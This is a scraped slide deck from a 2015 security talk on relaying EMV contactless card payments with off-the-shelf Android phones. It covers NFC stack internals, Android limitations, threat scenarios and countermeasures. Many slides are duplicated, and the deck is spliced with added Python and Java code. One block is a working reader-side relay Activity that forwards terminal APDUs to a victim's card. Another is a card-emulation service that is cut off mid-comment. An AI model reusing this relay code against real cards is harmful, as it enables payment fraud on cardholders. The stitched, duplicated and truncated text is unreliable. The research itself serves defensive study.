pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 13: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Introduction to NFC (VII)

Ok So is it secure right Right

If it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
Payment sector is quite interested in this new way of making payments
  500M NFC payment users expected by 2019
  Almost 300 smartphones available at the moment with NFC capabilities
    Check http://www.nfcworld.com/nfc-phones-list/
  Most of them run Android OS

Research Hypothesis
Can a passive relay attack be performed on contactless payment cards using an Android NFC-capable device?
If so, what are the constraints (if any exist)?


Background (I)
EMV contactless cards

Europay, MasterCard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
  Application ID (AID) command

Background (II)
MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
  Amount limit on a single transaction
    Up to £20 GBP, 20€, US$50, 50 CHF, CAD$100 or AUD$100
    cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
  Sequential contactless payments limited: it asks for the PIN
  Protected by the same fraud guarantee as standard transactions (hopefully)


Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)

[Figure: P → V̄ ... communication link ... P̄ → V, i.e. the honest prover P talks to a dishonest verifier V̄, which relays to a dishonest prover P̄ facing the honest verifier V]

Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate
  Honest prover and verifier: contactless card and Point-of-Sale terminal
  Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I)
Recap on evolution of Android NFC support

[Figure: timeline of Android NFC support against the NFC operation modes supported (reader/writer, peer-to-peer, hardware card emulation, software card emulation)]
  Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
  Android CyanogenMod OS 9.1 (thanks to Doug Yeager): IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), i.e. software card emulation
  Android 4.2 Jelly Bean (API level 17): NfcBarcode
  Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added, software card emulation (HCE)

Android and NFC: A Tale of L♥ve (II)
Digging into Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on built-in NFC chip):
  libnfc-nxp
  libnfc-nci
NXP dropped in favour of NCI
  Open architecture, not focused on a single chip family
  Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  Standard proposed by NFC Forum


Android and NFC: A Tale of L♥ve (III)
Digging into Android NFC stack – Reader/Writer mode

Not allowed to be set directly → Android activity
Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI)
  Makes communication between layers and modules easier

[Figure: transceive call path. User App → NFC developer framework (Tag → NfcService, mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → System NFC Library (NativeNfcTag.cpp, libnfc-nci)]

Android and NFC: A Tale of L♥ve (IV)
Digging into Android NFC stack – HCE mode

A service must be implemented to process commands and replies
  HostApduService abstract class and processCommandApdu method
AID-based routing service table
  This means you need to declare in advance what AID you handle
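The two slides above (the SELECT-by-AID command of Background (I) and the AID-based routing table of HCE mode) can be made concrete with a small model. The following is an added example, not code from the talk or from the Android project: it parses an ISO/IEC 7816-4 short-form command APDU, extracts the AID from a SELECT-by-DF-name command, and resolves it against a routing table the way an HCE service registered for a declared AID would be matched. The AIDs, the APDU bytes and the service name are constructed for illustration; the exact-match routing and "stay routed until the next SELECT" behaviour are my modelling assumptions.

```python
"""Parse SELECT-by-AID command APDUs and resolve them against an AID routing table.

Added example (not from the talk). AIDs, APDUs and service names are constructed;
the routing behaviour is a simplified model of Android's HCE AID routing.
"""
from dataclasses import dataclass
from typing import Dict, Optional

INS_SELECT = 0xA4
P1_SELECT_BY_DF_NAME = 0x04  # P1=04: select by DF name, i.e. by AID (ISO/IEC 7816-4)


@dataclass(frozen=True)
class Apdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes
    le: Optional[int]


def parse_apdu(raw: bytes) -> Apdu:
    """Parse a short-form command APDU: CLA INS P1 P2 [Lc data] [Le]."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[:4]
    body = raw[4:]
    if not body:                         # case 1: header only
        return Apdu(cla, ins, p1, p2, b"", None)
    if len(body) == 1:                   # case 2: header + Le (0 means 256)
        return Apdu(cla, ins, p1, p2, b"", body[0] or 256)
    lc = body[0]
    data = body[1:1 + lc]
    if len(data) != lc:
        raise ValueError("Lc does not match the data length")
    rest = body[1 + lc:]
    if len(rest) == 0:                   # case 3: header + Lc + data
        return Apdu(cla, ins, p1, p2, data, None)
    if len(rest) == 1:                   # case 4: header + Lc + data + Le
        return Apdu(cla, ins, p1, p2, data, rest[0] or 256)
    raise ValueError("trailing bytes after Le")


def selected_aid(apdu: Apdu) -> Optional[bytes]:
    """Return the AID when the APDU is a SELECT by DF name (AIDs are 5..16 bytes)."""
    if apdu.ins == INS_SELECT and apdu.p1 == P1_SELECT_BY_DF_NAME and 5 <= len(apdu.data) <= 16:
        return apdu.data
    return None


def route(apdu: Apdu, routing_table: Dict[bytes, str]) -> Optional[str]:
    """Stateless exact-match lookup: which registered service is selected by this APDU?"""
    aid = selected_aid(apdu)
    return None if aid is None else routing_table.get(aid)


class HceRouter:
    """Toy model of AID-based routing to HCE services (assumption: exact AID match,
    and once a SELECT has been routed, later APDUs go to that service until the
    next SELECT or a deactivation). An AID not declared in advance is never reached."""

    def __init__(self, routing_table: Dict[bytes, str]) -> None:
        self.routing_table = dict(routing_table)
        self.active: Optional[str] = None

    def on_apdu(self, raw: bytes) -> Optional[str]:
        apdu = parse_apdu(raw)
        aid = selected_aid(apdu)
        if aid is not None:
            # A SELECT re-routes; an unregistered AID leaves no service selected.
            self.active = self.routing_table.get(aid)
        return self.active

    def on_deactivated(self) -> None:
        self.active = None


# Constructed sample data (not real payment-scheme AIDs; the 'F' prefix is the
# proprietary AID range). The service name is hypothetical.
KNOWN_AID = bytes.fromhex("F0112233445566")
UNKNOWN_AID = bytes.fromhex("F0998877665544")
ROUTING_TABLE = {KNOWN_AID: "com.example.WalletService"}
SELECT_KNOWN = bytes.fromhex("00A40400") + bytes([len(KNOWN_AID)]) + KNOWN_AID + b"\x00"
SELECT_UNKNOWN = bytes.fromhex("00A40400") + bytes([len(UNKNOWN_AID)]) + UNKNOWN_AID + b"\x00"
GET_DATA = bytes.fromhex("80CA9F7F00")  # a non-SELECT command that must follow a SELECT


def demo() -> None:
    router = HceRouter(ROUTING_TABLE)
    for name, apdu in [("GET DATA", GET_DATA), ("SELECT known", SELECT_KNOWN),
                       ("GET DATA", GET_DATA), ("SELECT unknown", SELECT_UNKNOWN)]:
        print(f"{name:15} -> {router.on_apdu(apdu)}")


if __name__ == "__main__":
    demo()
```

The point for Limitation 2 later in the deck is visible in the router: a command arriving before any SELECT, or a SELECT for an AID that is not in the table, never reaches a service, which is why an HCE-based dishonest prover has to know the honest prover's AID in advance.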

Android and NFC: A Tale of L♥ve (V)
Digging into Android NFC stack – Summary

Description                                        Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)  Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)      C/C++         Manufacturer                Yes
NFC Android kernel driver                          C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)   ARM Thumb     Hardware and manufacturer   No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc/
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc/
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci/
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src/
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications/
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
  libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
    Caused by the CRC computation performed by the NFCC
    Overcome only if the NFCC is modified
  EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
  Device in HCE mode
    AID must be known in advance
    Overcome only if the device is rooted
      Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V)
Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
  FWT ∈ [500 µs, 5 s] → relay is theoretically possible when delay is ≤ 5 s

Concluding Remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
Any communication involving an APDU-compliant NFC tag (i.e., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice


Relay Attack Implementation (I)
Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
  One constraint only: the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II)
Threat Scenarios – Scenario 1

Distributed Mafia Fraud
[Figure: a BOTMASTER controlling several BOTs]

Relay Attack Implementation (III)
Threat Scenarios – Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms
Distance-bounding protocols
  Upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
Timing constraints
  Not enforced in current NFC-capable systems
  The protocol itself allows timing extension commands
Physical countermeasures
  Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  RFID blocking covers
  Physical button/switch activation
  Secondary authentication methods (e.g., on-card fingerprint scanners)
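The Frame Waiting Time formula from Limitation 3 and the "timing extension commands" bullet under Timing constraints above both turn on the same arithmetic, so one worked example serves both. The block below is added here and is not code from the talk: it evaluates FWT = 256 · (16 / fc) · 2^FWI with the deck's symbols for every legal FWI, reports whether a measured relay round-trip fits inside a reader's FWT, and models the S(WTX) waiting-time extension of ISO/IEC 14443-4 (the multiplier range 1..59 is taken from that standard as I know it; the function names and the sample delays are mine). It shows why an FWT budget on its own does not bound distance: the extension mechanism lets a slow responder ask for more time, which is the gap distance-bounding protocols are meant to close.

```python
"""Frame Waiting Time (FWT) budget check for an ISO/IEC 14443-4 exchange.

Added example (not from the talk). Evaluates FWT = 256 * (16 / fc) * 2**FWI for
every legal FWI and checks a measured round-trip delay against it, with and
without S(WTX) waiting-time extensions. Sample delays are constructed.
"""
from typing import List, Optional, Tuple

FC_HZ = 13_560_000           # ISO/IEC 14443 carrier frequency fc = 13.56 MHz
FWI_MIN, FWI_MAX = 0, 14     # legal range of the Frame Waiting Integer
WTXM_MIN, WTXM_MAX = 1, 59   # S(WTX) multiplier range (assumption: ISO/IEC 14443-4)


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time in seconds for a given FWI."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in [{FWI_MIN}, {FWI_MAX}]")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_table() -> List[Tuple[int, float]]:
    """(FWI, FWT in seconds) for every legal FWI, FWI=0 being about 302 us."""
    return [(fwi, fwt_seconds(fwi)) for fwi in range(FWI_MIN, FWI_MAX + 1)]


def fits_in_fwt(delay_s: float, fwi: int) -> bool:
    """True when a response arriving after delay_s still meets the reader's FWT."""
    return delay_s <= fwt_seconds(fwi)


def min_fwi(delay_s: float) -> Optional[int]:
    """Smallest FWI whose FWT covers delay_s, or None if even FWI=14 does not."""
    for fwi, fwt in fwt_table():
        if delay_s <= fwt:
            return fwi
    return None


def min_wtxm(delay_s: float, fwi: int) -> Optional[int]:
    """Smallest S(WTX) multiplier that makes delay_s acceptable at this FWI.

    A card (or anything emulating one) may answer S(WTX) with WTXM, which scales
    the waiting time to FWT * WTXM for the next response. Returns None when no
    legal multiplier is enough: that is the only point at which the waiting
    time alone would reject a slow response.
    """
    base = fwt_seconds(fwi)
    for wtxm in range(WTXM_MIN, WTXM_MAX + 1):
        if delay_s <= base * wtxm:
            return wtxm
    return None


def report(delay_s: float, fwi: int) -> str:
    """Human-readable verdict for one measured delay against one reader setting."""
    verdict = "within FWT" if fits_in_fwt(delay_s, fwi) else "exceeds FWT"
    wtxm = min_wtxm(delay_s, fwi)
    ext = f"WTXM={wtxm} would cover it" if wtxm else "no legal WTXM covers it"
    return f"delay={delay_s * 1e3:.3f} ms, FWI={fwi}, FWT={fwt_seconds(fwi) * 1e3:.3f} ms: {verdict}; {ext}"


if __name__ == "__main__":
    for fwi, fwt in fwt_table():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms")
    # Constructed sample delays: a direct tap, a LAN relay, a mobile-network relay.
    for delay in (0.0003, 0.010, 10.0):
        print(report(delay, 4))
```

Run stand-alone it prints the full FWI table (from about 302 µs up to just under 5 s) and three verdicts; a defender measuring round-trip times at a terminal can use `min_fwi` to see how low an FWI would have to be configured before a given relay latency is rejected, and `min_wtxm` to see how easily that rejection is lifted by the extension mechanism.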


Related Work
On relay attacks

2005-2009: First works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: Relay attacks on Android accessing Secure Elements
  An SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device
2014: Active relay attacks with custom hardware and custom Android firmware
Several works studied the delay over the relay channel
  Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical proximity assumption
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are rising
  Abused to interact with cards in their proximity

Conclusions
  Review of the Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
Virtual pickpocketing attacks may appear before long


Conclusions (II)
But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks with EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff

And thanks to all for hearing us
Visit http://vwzq.net/relaynfc/ for more info about the project

Page 14: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC: A Tale of L♥ve (III) – Digging into the Android NFC stack: Reader/Writer mode

Reader/Writer mode cannot be set directly by arbitrary code → it is requested by an Android Activity.
The Android NFC service selects which app receives a tag according to the tag (tech/NDEF) filters declared in the app's Manifest file.
At the low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier.

Call chain of a transceive() from a user app down to the controller (figure reconstructed as text):
User App → Tag (NFC developer framework) → NfcService.mTagService.transceive → IPC → TagService → DeviceHost.TagEndpoint, realized by NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (System NFC Library) → libnfc-nci
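The reader-side half of such a relay, as an added example that is not the authors' app (their ±2000 LOC application is not on the page): an Activity that enables reader mode on Android ≥ 4.4, accepts only ISO-DEP cards, and forwards command APDUs received from a hypothetical RelayChannel (a socket wrapper assumed here, not shown) to the card with IsoDep.transceive(). The package, class and RelayChannel names are assumptions; the transceive timeout is derived from the ISO/IEC 14443-4 frame waiting time formula the deck uses when discussing Limitation 3.

```java
package net.example.relay;  // hypothetical package name

import android.app.Activity;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import android.os.Bundle;
import android.util.Log;
import java.io.IOException;

public class RelayReaderActivity extends Activity implements NfcAdapter.ReaderCallback {
    private static final String TAG = "RelayReader";

    // Hypothetical transport to the phone that faces the terminal: it hands us
    // the command APDUs the terminal sent and takes the card's answers back.
    interface RelayChannel {
        byte[] readCommand() throws IOException;   // null when the session ends
        void writeResponse(byte[] rsp) throws IOException;
    }

    private NfcAdapter adapter;
    private RelayChannel channel;  // assumed to be connected by the app before a tap

    // ISO/IEC 14443-4: FWT = 256 * (16 / fc) * 2^FWI, fc = 13.56 MHz, 0 <= FWI <= 14.
    // The largest value a card can announce (FWI = 14) is about 4.95 s. Waiting at
    // least that long keeps this side from dropping a slow card before a
    // standards-compliant reader would.
    static int maxFwtMillis() {
        double fc = 13.56e6;
        double fwtSeconds = 256 * (16 / fc) * Math.pow(2, 14);
        return (int) Math.ceil(fwtSeconds * 1000);  // 4950
    }

    @Override
    protected void onResume() {
        super.onResume();
        adapter = NfcAdapter.getDefaultAdapter(this);
        // Reader mode is requested by a foreground Activity, not set globally.
        // Restricting to ISO/IEC 14443-A and skipping the NDEF check makes the NFC
        // service hand the Tag to this callback instead of dispatching it by the
        // tech/NDEF filters other apps declare in their manifests.
        adapter.enableReaderMode(this, this,
                NfcAdapter.FLAG_READER_NFC_A | NfcAdapter.FLAG_READER_SKIP_NDEF_CHECK,
                null);
    }

    @Override
    protected void onPause() {
        super.onPause();
        if (adapter != null) adapter.disableReaderMode(this);
    }

    // Called on a binder thread, so blocking on the card and the channel is fine.
    @Override
    public void onTagDiscovered(Tag tag) {
        IsoDep card = IsoDep.get(tag);  // null unless the tag implements 14443-4
        if (card == null) {
            // e.g. MIFARE Classic: libnfc-nci exposes no raw 14443-3 transceive
            // (the NFCC computes the CRC), so it cannot be relayed this way.
            Log.w(TAG, "not an ISO-DEP tag, cannot relay at APDU level");
            return;
        }
        try {
            card.connect();
            card.setTimeout(maxFwtMillis());
            Log.i(TAG, "ATS historical bytes: " + hex(card.getHistoricalBytes()));
            byte[] cmd;
            // Passive relay: every command goes to the card unchanged, every
            // response goes back unchanged. The per-APDU time measured here is
            // what has to fit inside the terminal's frame waiting time on the
            // other side of the relay.
            while (card.isConnected() && (cmd = channel.readCommand()) != null) {
                long t0 = System.nanoTime();
                byte[] rsp = card.transceive(cmd);
                long ms = (System.nanoTime() - t0) / 1_000_000;
                Log.d(TAG, hex(cmd) + " -> " + hex(rsp) + " (" + ms + " ms)");
                channel.writeResponse(rsp);
            }
        } catch (IOException e) {
            Log.e(TAG, "card or channel lost: " + e);
        } finally {
            try { card.close(); } catch (IOException ignored) { }
        }
    }

    static String hex(byte[] b) {
        if (b == null) return "";
        StringBuilder sb = new StringBuilder(b.length * 2);
        for (byte x : b) sb.append(String.format("%02X", x));
        return sb.toString();
    }
}
```

The timeout set here only protects the dishonest verifier from giving up on a slow card; the latency budget that actually decides whether the relay succeeds is the frame waiting time the honest verifier (the PoS) enforces on the other phone, which this side cannot influence.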

Android and NFC: A Tale of L♥ve (IV) – Digging into the Android NFC stack: HCE mode

A service must be implemented to process commands and replies: extend the HostApduService abstract class and implement its processCommandApdu method.
Routing is AID-based (a service table): a SELECT for a registered AID, and the APDUs that follow it, are delivered to the service that declared that AID.
This means you need to declare in advance which AIDs you handle.
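The other half of the relay, the dishonest prover facing the terminal, as an added example that is not the authors' code: an Android 4.4 HostApduService that ships every command APDU it receives over a hypothetical RelayChannel and answers with whatever the real card replied. The manifest and AID-filter XML it needs are given in the leading comment, because only APDUs addressed to a declared AID ever reach processCommandApdu(). The package, class and RelayChannel names are assumptions; the AIDs are the PPSE name 2PAY.SYS.DDF01 and the well-known MasterCard and Visa payment AIDs.

```java
package net.example.relay;  // hypothetical package name

import android.nfc.cardemulation.HostApduService;
import android.os.Bundle;
import android.util.Log;
import java.io.IOException;
import java.util.Arrays;

// Assumed AndroidManifest.xml entry (exported, but bindable only by the NFC service):
//   <service android:name=".RelayApduService" android:exported="true"
//            android:permission="android.permission.BIND_NFC_SERVICE">
//     <intent-filter>
//       <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
//     </intent-filter>
//     <meta-data android:name="android.nfc.cardemulation.host_apdu_service"
//                android:resource="@xml/apduservice"/>
//   </service>
// Assumed res/xml/apduservice.xml, i.e. this app's rows in the AID routing table:
//   <host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
//       android:description="@string/relay_desc" android:requireDeviceUnlock="false">
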